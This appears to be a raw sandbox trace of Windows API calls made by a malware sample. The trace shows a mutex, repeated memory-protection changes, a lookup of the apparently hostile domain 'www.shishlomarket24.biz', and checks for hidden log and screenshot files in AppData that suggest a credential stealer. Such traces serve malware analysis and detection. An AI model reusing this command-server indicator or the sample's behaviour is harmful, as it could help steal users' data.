0x0 [0121.540] RtlIntegerToChar (in: Value=0x5321a0cf, Base=0x0, Length=0x20, String=0xcf950 | out: String="1394712783") returned 0x0 [0121.540] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="S-1-5-21-1560258-18641394712783") returned 0x1ff4 [0121.540] GetLastError () returned 0x0 [0121.592] LdrGetProcedureAddress (in: BaseAddress=0x7ff8842c0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ff882321540) returned 0x0 [0121.596] LdrGetProcedureAddress (in: BaseAddress=0x7ff8842c0000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ff882322c50) returned 0x0 [0121.598] LdrGetProcedureAddress (in: BaseAddress=0x7ff8842c0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ff88235fb70) returned 0x0 [0121.668] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf100 | out: Value="RDhJ0CNFevzX") returned 0x0 [0121.687] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xcf400 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0121.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dcad0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0121.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dcad0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0122.038] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820e2df0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820e2000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0122.050] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820e2df0, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820e2000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0122.099] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dc540, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0122.112] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dc540, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0122.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dc670, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x40, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x20) returned 0x0 [0122.198] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0xcf5b8*=0x7ff8820dc670, NumberOfBytesToProtect=0xcf5b0, NewAccessProtection=0x20, OldAccessProtection=0xcf700 | out: BaseAddress=0xcf5b8*=0x7ff8820dc000, NumberOfBytesToProtect=0xcf5b0, OldAccessProtection=0xcf700*=0x40) returned 0x0 [0122.289] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xcf39e, cbSize=0xcf370 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xcf370) returned 0x0 [0122.479] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xcf770 | out: lpWSAData=0xcf770) returned 0 [0122.488] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xa0ddca5, lpParameter=0xa0e2f56, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2100 Thread: id = 82 os_tid = 0x308 [0123.325] Sleep (dwMilliseconds=0x7d0) [0125.442] Sleep (dwMilliseconds=0x7d0) [0127.517] Sleep (dwMilliseconds=0x7d0) [0129.518] Sleep (dwMilliseconds=0x7d0) [0131.518] Sleep (dwMilliseconds=0x7d0) [0133.541] Sleep (dwMilliseconds=0x7d0) [0135.718] Sleep (dwMilliseconds=0x7d0) [0137.726] Sleep (dwMilliseconds=0x7d0) [0139.728] Sleep (dwMilliseconds=0x7d0) [0141.729] Sleep (dwMilliseconds=0x7d0) [0143.820] socket (af=2, type=1, protocol=6) returned 0x24a4 [0143.827] getaddrinfo (in: pNodeName="www.shishlomarket24.biz", pServiceName="80", pHints=0x878f3b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f3e8 | out: ppResult=0x878f3e8*=0x0) returned 11001 [0143.872] Sleep (dwMilliseconds=0x7d0) [0143.942] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.948] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.968] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0143.968] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928c70) returned 1 [0143.968] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.968] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.969] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928eb0) returned 1 [0143.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.969] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.969] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929960) returned 1 [0143.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.969] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.969] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.969] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0143.969] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.969] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929960) returned 1 [0143.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928c70) returned 1 [0143.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928c70) returned 1 [0143.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.970] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.970] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928c70) returned 1 [0143.970] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0143.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.971] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0143.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929720) returned 1 [0143.971] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0143.971] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0143.971] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0143.971] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0143.971] Sleep (dwMilliseconds=0x7d0) [0143.973] Sleep (dwMilliseconds=0x7d0) [0143.974] Sleep (dwMilliseconds=0x7d0) [0143.975] Sleep (dwMilliseconds=0x7d0) [0143.977] Sleep (dwMilliseconds=0x7d0) [0143.978] Sleep (dwMilliseconds=0x7d0) [0143.980] Sleep (dwMilliseconds=0x7d0) [0143.982] Sleep (dwMilliseconds=0x7d0) [0143.983] Sleep (dwMilliseconds=0x7d0) [0143.984] Sleep (dwMilliseconds=0x7d0) [0143.986] Sleep (dwMilliseconds=0x7d0) [0143.987] Sleep (dwMilliseconds=0x7d0) [0143.989] Sleep (dwMilliseconds=0x7d0) [0144.012] Sleep (dwMilliseconds=0x7d0) [0144.013] Sleep (dwMilliseconds=0x7d0) [0144.015] Sleep (dwMilliseconds=0x7d0) [0144.016] Sleep (dwMilliseconds=0x7d0) [0144.018] Sleep (dwMilliseconds=0x7d0) [0144.020] Sleep (dwMilliseconds=0x7d0) [0144.021] Sleep (dwMilliseconds=0x7d0) [0144.022] Sleep (dwMilliseconds=0x7d0) [0144.024] Sleep (dwMilliseconds=0x7d0) [0144.025] Sleep (dwMilliseconds=0x7d0) [0144.027] Sleep (dwMilliseconds=0x7d0) [0144.028] Sleep (dwMilliseconds=0x7d0) [0144.030] Sleep (dwMilliseconds=0x7d0) [0144.032] Sleep (dwMilliseconds=0x7d0) [0144.033] Sleep (dwMilliseconds=0x7d0) [0144.034] Sleep (dwMilliseconds=0x7d0) [0144.036] Sleep (dwMilliseconds=0x7d0) [0144.037] Sleep (dwMilliseconds=0x7d0) [0144.039] Sleep (dwMilliseconds=0x7d0) [0144.040] Sleep (dwMilliseconds=0x7d0) [0144.042] Sleep (dwMilliseconds=0x7d0) [0144.043] Sleep (dwMilliseconds=0x7d0) [0144.045] Sleep (dwMilliseconds=0x7d0) [0144.046] Sleep (dwMilliseconds=0x7d0) [0144.048] Sleep (dwMilliseconds=0x7d0) [0144.050] Sleep (dwMilliseconds=0x7d0) [0144.051] Sleep (dwMilliseconds=0x7d0) [0144.053] Sleep (dwMilliseconds=0x7d0) [0144.054] Sleep (dwMilliseconds=0x7d0) [0144.056] Sleep (dwMilliseconds=0x7d0) [0144.057] Sleep (dwMilliseconds=0x7d0) [0144.059] Sleep (dwMilliseconds=0x7d0) [0144.060] Sleep (dwMilliseconds=0x7d0) [0144.062] Sleep (dwMilliseconds=0x7d0) [0144.064] Sleep (dwMilliseconds=0x7d0) [0144.065] Sleep (dwMilliseconds=0x7d0) [0144.067] Sleep (dwMilliseconds=0x7d0) [0144.069] Sleep (dwMilliseconds=0x7d0) [0144.070] Sleep (dwMilliseconds=0x7d0) [0144.072] Sleep (dwMilliseconds=0x7d0) [0144.073] Sleep (dwMilliseconds=0x7d0) [0144.074] Sleep (dwMilliseconds=0x7d0) [0144.076] Sleep (dwMilliseconds=0x7d0) [0144.077] Sleep (dwMilliseconds=0x7d0) [0144.079] Sleep (dwMilliseconds=0x7d0) [0144.080] Sleep (dwMilliseconds=0x7d0) [0144.082] Sleep (dwMilliseconds=0x7d0) [0144.083] Sleep (dwMilliseconds=0x7d0) [0144.085] Sleep (dwMilliseconds=0x7d0) [0144.087] Sleep (dwMilliseconds=0x7d0) [0144.088] Sleep (dwMilliseconds=0x7d0) [0144.090] Sleep (dwMilliseconds=0x7d0) [0144.091] Sleep (dwMilliseconds=0x7d0) [0144.092] Sleep (dwMilliseconds=0x7d0) [0144.094] Sleep (dwMilliseconds=0x7d0) [0144.096] Sleep (dwMilliseconds=0x7d0) [0144.097] Sleep (dwMilliseconds=0x7d0) [0144.098] Sleep (dwMilliseconds=0x7d0) [0144.100] Sleep (dwMilliseconds=0x7d0) [0144.102] Sleep (dwMilliseconds=0x7d0) [0144.103] Sleep (dwMilliseconds=0x7d0) [0144.105] Sleep (dwMilliseconds=0x7d0) [0144.106] Sleep (dwMilliseconds=0x7d0) [0144.107] Sleep (dwMilliseconds=0x7d0) [0144.109] Sleep (dwMilliseconds=0x7d0) [0144.110] Sleep (dwMilliseconds=0x7d0) [0144.112] Sleep (dwMilliseconds=0x7d0) [0144.113] Sleep (dwMilliseconds=0x7d0) [0144.115] Sleep (dwMilliseconds=0x7d0) [0144.116] Sleep (dwMilliseconds=0x7d0) [0144.118] Sleep (dwMilliseconds=0x7d0) [0144.120] Sleep (dwMilliseconds=0x7d0) [0144.121] Sleep (dwMilliseconds=0x7d0) [0144.122] Sleep (dwMilliseconds=0x7d0) [0144.124] Sleep (dwMilliseconds=0x7d0) [0144.125] Sleep (dwMilliseconds=0x7d0) [0144.127] Sleep (dwMilliseconds=0x7d0) [0144.128] Sleep (dwMilliseconds=0x7d0) [0144.130] Sleep (dwMilliseconds=0x7d0) [0144.132] Sleep (dwMilliseconds=0x7d0) [0144.133] Sleep (dwMilliseconds=0x7d0) [0144.135] Sleep (dwMilliseconds=0x7d0) [0144.136] Sleep (dwMilliseconds=0x7d0) [0144.137] Sleep (dwMilliseconds=0x7d0) [0144.139] Sleep (dwMilliseconds=0x7d0) [0144.140] Sleep (dwMilliseconds=0x7d0) [0144.142] Sleep (dwMilliseconds=0x7d0) [0144.143] Sleep (dwMilliseconds=0x7d0) [0144.145] Sleep (dwMilliseconds=0x7d0) [0144.146] Sleep (dwMilliseconds=0x7d0) [0144.148] Sleep (dwMilliseconds=0x7d0) [0144.150] Sleep (dwMilliseconds=0x7d0) [0144.151] Sleep (dwMilliseconds=0x7d0) [0144.152] Sleep (dwMilliseconds=0x7d0) [0144.154] Sleep (dwMilliseconds=0x7d0) [0144.155] Sleep (dwMilliseconds=0x7d0) [0144.157] Sleep (dwMilliseconds=0x7d0) [0144.158] Sleep (dwMilliseconds=0x7d0) [0144.160] Sleep (dwMilliseconds=0x7d0) [0144.162] Sleep (dwMilliseconds=0x7d0) [0144.163] Sleep (dwMilliseconds=0x7d0) [0144.164] Sleep (dwMilliseconds=0x7d0) [0144.166] Sleep (dwMilliseconds=0x7d0) [0144.167] Sleep (dwMilliseconds=0x7d0) [0144.169] Sleep (dwMilliseconds=0x7d0) [0144.170] Sleep (dwMilliseconds=0x7d0) [0144.172] Sleep (dwMilliseconds=0x7d0) [0144.173] Sleep (dwMilliseconds=0x7d0) [0144.175] Sleep (dwMilliseconds=0x7d0) [0144.177] Sleep (dwMilliseconds=0x7d0) [0144.178] Sleep (dwMilliseconds=0x7d0) [0144.180] Sleep (dwMilliseconds=0x7d0) [0144.181] Sleep (dwMilliseconds=0x7d0) [0144.182] Sleep (dwMilliseconds=0x7d0) [0144.185] Sleep (dwMilliseconds=0x7d0) [0144.187] Sleep (dwMilliseconds=0x7d0) 